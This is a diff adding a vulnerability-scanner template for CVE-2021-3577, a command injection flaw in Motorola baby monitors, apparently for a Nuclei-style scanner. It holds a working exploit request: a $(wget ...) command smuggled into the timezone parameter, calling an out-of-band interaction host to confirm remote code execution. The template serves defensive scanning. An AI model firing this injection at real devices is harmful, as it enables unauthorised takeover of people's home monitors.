diff --git a/cves/2021/CVE-2021-3577.yaml b/cves/2021/CVE-2021-3577.yaml new file mode 100644 index 0000000000..b196ed7f2e --- /dev/null +++ b/cves/2021/CVE-2021-3577.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-3577 + +info: + name: Motorola Baby Monitors Unauthenticated RCE + description: Vulnerabilities in the interface of Motorola Baby Monitors could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: + - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/ + tags: cve,cve2021,baby,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3577 + cwe-id: CWE-78 + +requests: + - raw: + - | + GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http"